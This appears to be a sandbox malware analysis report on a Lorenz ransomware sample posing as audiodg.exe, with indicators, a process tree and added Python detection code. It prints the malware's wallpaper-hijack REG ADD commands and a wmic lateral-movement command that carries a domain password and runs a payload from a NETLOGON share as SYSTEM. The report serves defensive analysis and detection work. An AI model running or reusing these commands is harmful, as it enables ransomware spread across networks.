Analysis
- max time kernel: 375s
- max time network: 360s
- platform: windows10_x64
- resource: win10-en-20211104
- submitted: 14/11/2021, 04:39
Static task: static1
Behavioral task: behavioral1
- Sample: audiodg.exe
- Resource: win7-en-20211104
Behavioral task: behavioral2
- Sample: audiodg.exe
- Resource: win10-en-20211104

The signatures and process tree below are from behavioral2 (platform windows10_x64, resource win10-en-20211104).
General
- Target: audiodg.exe
- Size: 1.1MB
- MD5: 7b760f60fff500d3c7c408a8bc158e0e
- SHA1: a4b41efc63460f980130b67eb33c0bd061206744
- SHA256: a0ccb9019b90716c8ee1bc0829e0e04cf7166be2f25987abbc8987e65cef2e6f
- SHA512: 13662b1447806779d82a29fbb931ec8d400adacd9074c4bbce8db8afd34bbf0c87e43b7790c1631b8d4edc870dbf5348773beadea59a3f73438cdb072c24ae75

The file name mimics the legitimate Windows Audio Device Graph Isolation binary (C:\Windows\System32\audiodg.exe); this sample ran from C:\Users\Admin\AppData\Local\Temp (see the process tree), so hunt on path and hash, not on name.
Malware Config
- Extracted from: C:\Users\Admin\Desktop\HELP_SECURITY_EVENT.html (the HTML file left on the desktop; the report lists no further configuration fields)
Signatures

Modifies extensions of user files (2 IoCs)
Ransomware generally changes the extension on encrypted files. This sample appends .Lorenz.sz40 to the full original name, so the pre-encryption file name and extension survive in front of the suffix.
description | ioc | Process
File created | C:\Users\Admin\Pictures\SaveOpen.crw.Lorenz.sz40 | audiodg.exe
File created | C:\Users\Admin\Pictures\WatchGrant.tiff.Lorenz.sz40 | audiodg.exe
Enumerates connected drives (3 TTPs, 24 IoCs)
Attempts to read the root path of hard drives other than the default C: drive. The sample tries to open the root of every drive letter except C: and D: (A:, B:, and E: through Z:), the sweep an encryptor performs to find additional, removable or mapped volumes.
description | ioc | Process
File opened (read-only) | \??\A: | audiodg.exe
File opened (read-only) | \??\B: | audiodg.exe
File opened (read-only) | \??\E: | audiodg.exe
File opened (read-only) | \??\F: | audiodg.exe
File opened (read-only) | \??\G: | audiodg.exe
File opened (read-only) | \??\H: | audiodg.exe
File opened (read-only) | \??\I: | audiodg.exe
File opened (read-only) | \??\J: | audiodg.exe
File opened (read-only) | \??\K: | audiodg.exe
File opened (read-only) | \??\L: | audiodg.exe
File opened (read-only) | \??\M: | audiodg.exe
File opened (read-only) | \??\N: | audiodg.exe
File opened (read-only) | \??\O: | audiodg.exe
File opened (read-only) | \??\P: | audiodg.exe
File opened (read-only) | \??\Q: | audiodg.exe
File opened (read-only) | \??\R: | audiodg.exe
File opened (read-only) | \??\S: | audiodg.exe
File opened (read-only) | \??\T: | audiodg.exe
File opened (read-only) | \??\U: | audiodg.exe
File opened (read-only) | \??\V: | audiodg.exe
File opened (read-only) | \??\W: | audiodg.exe
File opened (read-only) | \??\X: | audiodg.exe
File opened (read-only) | \??\Y: | audiodg.exe
File opened (read-only) | \??\Z: | audiodg.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
The write is made by reg.exe, which the sample launches through cmd.exe (see the process tree), not by audiodg.exe itself.
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\8K3e5x6k1v12.bmp" | reg.exe
Drops file in Program Files directory (64 IoCs)
All 64 entries are files created by audiodg.exe, each an existing file under C:\Program Files or C:\Program Files (x86) with the .Lorenz.sz40 suffix appended:
- C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\Licenses16\MondoR_ConsumerSub_Bypass30-ppd.xrm-ms.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-ul-oob.xrm-ms.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_Subscription-pl.xrm-ms.Lorenz.sz40
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_delete_18.svg.Lorenz.sz40
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ru-ru\AppStore_icon.svg.Lorenz.sz40
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ja-jp\ui-strings.js.Lorenz.sz40
- C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sampler.xml.Lorenz.sz40
- C:\Program Files\Java\jre1.8.0_66\release.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Trial-ppd.xrm-ms.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\Office16\FPA_w1\WA104381125.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Send2Fluent.png.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\vfs\Fonts\private\GOTHICBI.TTF.Lorenz.sz40
- C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png.Lorenz.sz40
- C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_es.properties.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription1-ppd.xrm-ms.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Retail2-ppd.xrm-ms.Lorenz.sz40
- C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\de.pak.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019VL_MAK_AE-ul-phn.xrm-ms.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-white_scale-180.png.Lorenz.sz40
- C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp-ul-oob.xrm-ms.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN121.XML.Lorenz.sz40
- C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Functions\It.Tests.ps1.Lorenz.sz40
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\ui-strings.js.Lorenz.sz40
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\selector.js.Lorenz.sz40
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\bun.png.Lorenz.sz40
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\pt-br\ui-strings.js.Lorenz.sz40
- C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-nodes_zh_CN.jar.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial3-ul-oob.xrm-ms.Lorenz.sz40
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Spelling.api.Lorenz.sz40
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-ae\ui-strings.js.Lorenz.sz40
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\root\ui-strings.js.Lorenz.sz40
- C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_MAK_AE-ppd.xrm-ms.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_Grace-ppd.xrm-ms.Lorenz.sz40
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\AppStore_icon.svg.Lorenz.sz40
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\selector.js.Lorenz.sz40
- C:\Program Files\7-Zip\Lang\zh-tw.txt.Lorenz.sz40
- C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Retail-ul-phn.xrm-ms.Lorenz.sz40
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_bow.png.Lorenz.sz40
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\SearchEmail2x.png.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Century Schoolbook.xml.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription2-pl.xrm-ms.Lorenz.sz40
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\cs-cz\ui-strings.js.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\Integration\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.Lorenz.sz40
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_nextarrow_default.svg.Lorenz.sz40
- C:\Program Files\7-Zip\Lang\sv.txt.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL104.XML.Lorenz.sz40
- C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository_1.1.300.v20131211-1531.jar.Lorenz.sz40
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\main-selector.css.Lorenz.sz40
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ui-strings.js.Lorenz.sz40
- C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\jhall-2.0_05.jar.Lorenz.sz40
- C:\Program Files\ShowResume.bmp.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp6-pl.xrm-ms.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe.manifest.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL116.XML.Lorenz.sz40
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt.Lorenz.sz40
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\x_2x.png.Lorenz.sz40
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\nb-no\ui-strings.js.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\vfs\Fonts\private\MSUIGHUB.TTF.Lorenz.sz40
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\ui-strings.js.Lorenz.sz40
- C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PAPYRUS\PAPYRUS.ELM.Lorenz.sz40
Drops file in Windows directory (1 IoC)
This is the bitmap that every REG ADD in the process tree points the Wallpaper value at.
description | ioc | Process
File created | C:\Windows\8K3e5x6k1v12.bmp | audiodg.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour. No individual IoCs are listed for this signature.
Modifies data under HKEY_USERS (8 IoCs)
HKEY_USERS\S-1-5-18 is a symbolic link to HKEY_USERS\.DEFAULT, which is why the REG ADD against S-1-5-18 in the process tree appears here as a second pair of .DEFAULT entries and no S-1-5-18 key is listed.
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-19\Control Panel\Desktop | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-19\Control Panel\Desktop\Wallpaper = "C:\\Windows\\8K3e5x6k1v12.bmp" | reg.exe
Key created | \REGISTRY\USER\S-1-5-20\Control Panel\Desktop | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Control Panel\Desktop\Wallpaper = "C:\\Windows\\8K3e5x6k1v12.bmp" | reg.exe
Key created | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop | reg.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\Wallpaper = "C:\\Windows\\8K3e5x6k1v12.bmp" | reg.exe
Key created | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop | reg.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\Wallpaper = "C:\\Windows\\8K3e5x6k1v12.bmp" | reg.exe
Modifies registry class (3 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Control Panel\Desktop | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Control Panel | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Control Panel\Desktop\Wallpaper = "C:\\Windows\\8K3e5x6k1v12.bmp" | reg.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid | Process
2020 | audiodg.exe (the same entry is reported 64 times)
Suspicious use of AdjustPrivilegeToken (42 IoCs)
All entries belong to WMIC.exe (PID 1788) and the same 21 privileges are reported twice. Enabling every privilege present in its token is what wmic.exe does at startup, so this signature fires for any WMIC invocation; the indicator worth acting on is the WMIC command line in the process tree.
description | pid | Process
Token: SeIncreaseQuotaPrivilege | 1788 | WMIC.exe
Token: SeSecurityPrivilege | 1788 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 1788 | WMIC.exe
Token: SeLoadDriverPrivilege | 1788 | WMIC.exe
Token: SeSystemProfilePrivilege | 1788 | WMIC.exe
Token: SeSystemtimePrivilege | 1788 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 1788 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 1788 | WMIC.exe
Token: SeCreatePagefilePrivilege | 1788 | WMIC.exe
Token: SeBackupPrivilege | 1788 | WMIC.exe
Token: SeRestorePrivilege | 1788 | WMIC.exe
Token: SeShutdownPrivilege | 1788 | WMIC.exe
Token: SeDebugPrivilege | 1788 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 1788 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 1788 | WMIC.exe
Token: SeUndockPrivilege | 1788 | WMIC.exe
Token: SeManageVolumePrivilege | 1788 | WMIC.exe
Token: 33 | 1788 | WMIC.exe
Token: 34 | 1788 | WMIC.exe
Token: 35 | 1788 | WMIC.exe
Token: 36 | 1788 | WMIC.exe
Suspicious use of WriteProcessMemory (42 IoCs)
Every entry is a parent writing into a child it has just spawned, and each pair is reported three times; that is the memory setup CreateProcess performs for a new process. No write targets an unrelated process, so this is process spawning rather than injection.
description | pid | Process | procid_target
PID 2020 wrote to memory of 4064 | 2020 | audiodg.exe | 70 (reported 3 times)
PID 4064 wrote to memory of 4080 | 4064 | cmd.exe | 71 (reported 3 times)
PID 2020 wrote to memory of 1724 | 2020 | audiodg.exe | 72 (reported 3 times)
PID 1724 wrote to memory of 4176 | 1724 | cmd.exe | 73 (reported 3 times)
PID 2020 wrote to memory of 4168 | 2020 | audiodg.exe | 74 (reported 3 times)
PID 4168 wrote to memory of 4184 | 4168 | cmd.exe | 75 (reported 3 times)
PID 2020 wrote to memory of 1588 | 2020 | audiodg.exe | 76 (reported 3 times)
PID 1588 wrote to memory of 4336 | 1588 | cmd.exe | 77 (reported 3 times)
PID 2020 wrote to memory of 4420 | 2020 | audiodg.exe | 78 (reported 3 times)
PID 4420 wrote to memory of 4400 | 4420 | cmd.exe | 79 (reported 3 times)
PID 2020 wrote to memory of 4316 | 2020 | audiodg.exe | 80 (reported 3 times)
PID 4316 wrote to memory of 4288 | 4316 | cmd.exe | 81 (reported 3 times)
PID 2020 wrote to memory of 3964 | 2020 | audiodg.exe | 82 (reported 3 times)
PID 3964 wrote to memory of 1788 | 3964 | cmd.exe | 84 (reported 3 times)
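The three file-system and registry behaviours in the signatures above (a fixed suffix appended to encrypted files, the A: to Z: drive-root sweep, and a Wallpaper value written into service and default hives that no interactive user touches) reduce to checks that can run over endpoint telemetry. The Python below is an added example, not part of this report or of the sandbox that produced it. The event records it runs over are constructed from the IoCs on this page plus a few benign explorer.exe events for contrast; the event kinds (FileCreate, FileOpen, RegistryValueSet) and the threshold of eight distinct drive roots are assumptions chosen for illustration.

```python
import re
from collections import defaultdict

# Constructed events in the shape (process, event kind, target), hand-built from the
# IoCs in this report plus benign explorer.exe events for contrast. They are not a
# log captured from the sandbox.
EVENTS = [
    ("audiodg.exe", "FileCreate", r"C:\Users\Admin\Pictures\SaveOpen.crw.Lorenz.sz40"),
    ("audiodg.exe", "FileCreate", r"C:\Users\Admin\Pictures\WatchGrant.tiff.Lorenz.sz40"),
    ("audiodg.exe", "FileCreate", r"C:\Program Files\7-Zip\Lang\sv.txt.Lorenz.sz40"),
    ("audiodg.exe", "FileCreate", r"C:\Windows\8K3e5x6k1v12.bmp"),
    ("reg.exe", "RegistryValueSet", r"\REGISTRY\USER\S-1-5-19\Control Panel\Desktop\Wallpaper"),
    ("reg.exe", "RegistryValueSet", r"\REGISTRY\USER\S-1-5-20\Control Panel\Desktop\Wallpaper"),
    ("reg.exe", "RegistryValueSet", r"\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\Wallpaper"),
    ("reg.exe", "RegistryValueSet",
     r"\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\Desktop\Wallpaper"),
    ("reg.exe", "RegistryValueSet",
     r"\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Control Panel\Desktop\Wallpaper"),
    # A user changing their own wallpaper through the shell: one hive, their own.
    ("explorer.exe", "RegistryValueSet",
     r"\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\Desktop\Wallpaper"),
    ("explorer.exe", "FileOpen", r"\??\C:"),
    ("explorer.exe", "FileOpen", r"\??\E:"),
]
# The 24 drive-root opens from the "Enumerates connected drives" signature.
EVENTS += [("audiodg.exe", "FileOpen", "\\??\\%s:" % letter) for letter in "ABEFGHIJKLMNOPQRSTUVWXYZ"]

LORENZ_SUFFIX = ".Lorenz.sz40"


def encrypted_original(path):
    """Return the pre-encryption name when `path` carries the Lorenz suffix, else None.
    The suffix is appended, so the original extension survives in front of it."""
    if path.lower().endswith(LORENZ_SUFFIX.lower()):
        return path[:-len(LORENZ_SUFFIX)]
    return None


DRIVE_ROOT = re.compile(r"^\\\?\?\\([A-Z]):$", re.IGNORECASE)


def drive_enumerators(events, threshold=8):
    """Processes that open at least `threshold` distinct drive roots (\\??\\X:).
    A shell touches the drives that exist; an encryptor sweeps the alphabet.
    The threshold of 8 is an assumption for this example."""
    roots = defaultdict(set)
    for proc, kind, target in events:
        if kind == "FileOpen":
            m = DRIVE_ROOT.match(target)
            if m:
                roots[proc].add(m.group(1).upper())
    return {proc: sorted(r) for proc, r in roots.items() if len(r) >= threshold}


SERVICE_HIVES = {"S-1-5-18", "S-1-5-19", "S-1-5-20", ".DEFAULT"}
WALLPAPER = re.compile(
    r"^\\REGISTRY\\USER\\([^\\]+)\\Control Panel\\Desktop\\Wallpaper$", re.IGNORECASE)


def wallpaper_hijack(events):
    """Processes that set Wallpaper in a service/default hive, or in more than one
    user profile. SID and SID_Classes are folded into one profile before counting."""
    hives = defaultdict(set)
    for proc, kind, target in events:
        if kind == "RegistryValueSet":
            m = WALLPAPER.match(target)
            if m:
                hives[proc].add(m.group(1))
    flagged = {}
    for proc, hs in hives.items():
        profiles = {re.sub(r"_Classes$", "", h, flags=re.IGNORECASE) for h in hs}
        if hs & SERVICE_HIVES or len(profiles) > 1:
            flagged[proc] = sorted(hs)
    return flagged


def triage(events):
    """Summarise the three checks for a batch of events."""
    encrypted = sorted({t for _, k, t in events if k == "FileCreate" and encrypted_original(t)})
    return {
        "encrypted_files": encrypted,
        "drive_enumerators": drive_enumerators(events),
        "wallpaper_hijack": wallpaper_hijack(events),
    }


if __name__ == "__main__":
    for key, value in triage(EVENTS).items():
        print(key, value)
```

On the constructed input the wallpaper check flags reg.exe (five hives, three of them service or default hives) and leaves explorer.exe alone, and the drive check flags audiodg.exe for its 24 roots while explorer.exe's two are below the threshold.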
Processes
Indentation shows the parent/child relationship.

C:\Users\Admin\AppData\Local\Temp\audiodg.exe (PID 2020)
Command line: "C:\Users\Admin\AppData\Local\Temp\audiodg.exe"
- Modifies extensions of user files
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\cmd.exe (PID 4064)
    Command line: C:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\.DEFAULT\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"
    - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\reg.exe (PID 4080)
        Command line: REG ADD "HKEY_USERS\.DEFAULT\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"
        - Modifies data under HKEY_USERS

    C:\Windows\SysWOW64\cmd.exe (PID 1724)
    Command line: C:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-19\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"
    - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\reg.exe (PID 4176)
        Command line: REG ADD "HKEY_USERS\S-1-5-19\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"
        - Modifies data under HKEY_USERS

    C:\Windows\SysWOW64\cmd.exe (PID 4168)
    Command line: C:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-20\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"
    - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\reg.exe (PID 4184)
        Command line: REG ADD "HKEY_USERS\S-1-5-20\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"
        - Modifies data under HKEY_USERS

    C:\Windows\SysWOW64\cmd.exe (PID 1588)
    Command line: C:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"
    - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\reg.exe (PID 4336)
        Command line: REG ADD "HKEY_USERS\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"
        - Sets desktop wallpaper using registry

    C:\Windows\SysWOW64\cmd.exe (PID 4420)
    Command line: C:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"
    - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\reg.exe (PID 4400)
        Command line: REG ADD "HKEY_USERS\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"
        - Modifies registry class

    C:\Windows\SysWOW64\cmd.exe (PID 4316)
    Command line: C:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-18\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"
    - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\reg.exe (PID 4288)
        Command line: REG ADD "HKEY_USERS\S-1-5-18\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"
        - Modifies data under HKEY_USERS

    C:\Windows\SysWOW64\cmd.exe (PID 3964)
    Command line: "C:\Windows\System32\cmd.exe" /c wmic /node:'0.0.0.0' /USER:'BioPlus.net\sqluser2' /PASSWORD:'az21x5t' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz401 /TR 'copy \\BioPlus.net\NETLOGON\weams.exe %windir%lsamp.exe & start %windir%lsamp.exe' & SCHTASKS /run /TN sz401&SCHTASKS /Delete /TN sz401 /F"
    - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 1788)
        Command line: wmic /node:'0.0.0.0' /USER:'BioPlus.net\sqluser2' /PASSWORD:'az21x5t' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz401 /TR 'copy \\BioPlus.net\NETLOGON\weams.exe C:\Windowslsamp.exe & start C:\Windowslsamp.exe' & SCHTASKS /run /TN sz401&SCHTASKS /Delete /TN sz401 /F"
        - Suspicious use of AdjustPrivilegeToken

Notes on the tree:
- The first six children each point the Wallpaper value at C:\Windows\8K3e5x6k1v12.bmp in a different hive: .DEFAULT, S-1-5-19 (LOCAL SERVICE), S-1-5-20 (NETWORK SERVICE), the logged-on user's SID, that SID's _Classes hive, and S-1-5-18 (SYSTEM). Covering the service and default hives as well as the user's is what separates this from a user changing their own wallpaper.
- Every child's image path is under C:\Windows\SysWOW64 although the command line names system32 (or gives no path). That is WOW64 file-system redirection, which means audiodg.exe is a 32-bit executable.
- The seventh child is the lateral-movement attempt: wmic is given domain credentials on the command line (BioPlus.net\sqluser2 with its password) and asked to create a remote process that registers a scheduled task running as SYSTEM (/RU System) on logon, runs it immediately (SCHTASKS /run), then deletes it (SCHTASKS /Delete), a one-shot execution as SYSTEM whose payload is copied from the domain's NETLOGON share (\\BioPlus.net\NETLOGON\weams.exe). The target node in this sample is 0.0.0.0, and no child process is recorded under WMIC.exe (PID 1788) in this run.
- The copy destination %windir%lsamp.exe has no separator after the variable, so cmd.exe expands it to C:\Windowslsamp.exe in the root of C:, as the WMIC.exe command line shows.
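The last branch of the tree is the one to hunt for: a wmic remote process creation carrying domain credentials on the command line that registers, runs and deletes a scheduled task as SYSTEM in one shot, with a copy from a NETLOGON share as the payload. The Python below extracts those pieces from the command lines and also flags the SysWOW64/system32 mismatch. It is an added example, not code from this report or from the sandbox that produced it; the process records are constructed from the tree above, and the record fields (pid, ppid, image, cmdline) and the finding labels are assumptions made for the example.

```python
import ntpath
import re

# Constructed process-creation records shaped after the process tree in this report.
# Hand-built for the example; not sandbox output. Only the records the checks need
# are included.
PROCESSES = [
    {"pid": 2020, "ppid": 0,
     "image": r"C:\Users\Admin\AppData\Local\Temp\audiodg.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\audiodg.exe"'},
    {"pid": 4316, "ppid": 2020,
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": (r'C:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-18\Control Panel\Desktop" '
                 r'/V Wallpaper /T REG_SZ /F /D "C:\Windows\8K3e5x6k1v12.bmp"')},
    {"pid": 3964, "ppid": 2020,
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": (r'''"C:\Windows\System32\cmd.exe" /c wmic /node:'0.0.0.0' /USER:'BioPlus.net\sqluser2' '''
                 r'''/PASSWORD:'az21x5t' process call create "cmd.exe /c schtasks /Create /F /RU System '''
                 r'''/SC ONLOGON /TN sz401 /TR 'copy \\BioPlus.net\NETLOGON\weams.exe %windir%lsamp.exe '''
                 r'''& start %windir%lsamp.exe' & SCHTASKS /run /TN sz401&SCHTASKS /Delete /TN sz401 /F"''')},
]


def wmic_remote_exec(cmdline):
    """Parse `wmic /node:<host> ... process call create "<cmd>"`: the remote host, the
    account used, whether a password travels on the command line, and the command
    run remotely. Returns None when the line is not a remote process creation."""
    created = re.search(r'process\s+call\s+create\s+"(.*)"', cmdline, re.I | re.S)
    node = re.search(r"""/node:['"]?([^'"\s]+)""", cmdline, re.I)
    if not (created and node):
        return None
    user = re.search(r"""/user:['"]?([^'"\s]+)""", cmdline, re.I)
    return {
        "node": node.group(1),
        "user": user.group(1) if user else None,
        "password_on_cmdline": re.search(r"/password:", cmdline, re.I) is not None,
        "remote_command": created.group(1),
    }


def expand_windir(path, windir=r"C:\Windows"):
    """Expand %windir% the way cmd.exe does: plain substitution, no separator added."""
    return re.sub(r"%windir%", lambda _: windir, path, flags=re.I)


def schtasks_one_shot(remote_command):
    """Detect a task registered to run as SYSTEM, run at once, then deleted, and pull
    out what it copies and where. The /TR payload is single-quoted and contains '&'
    itself, so verbs are matched in sequence instead of splitting on '&'."""
    verbs = re.findall(r"schtasks\s+/(create|run|delete)\b.*?/TN\s+([^\s&|]+)",
                       remote_command, re.I)
    by_task = {}
    for verb, task in verbs:
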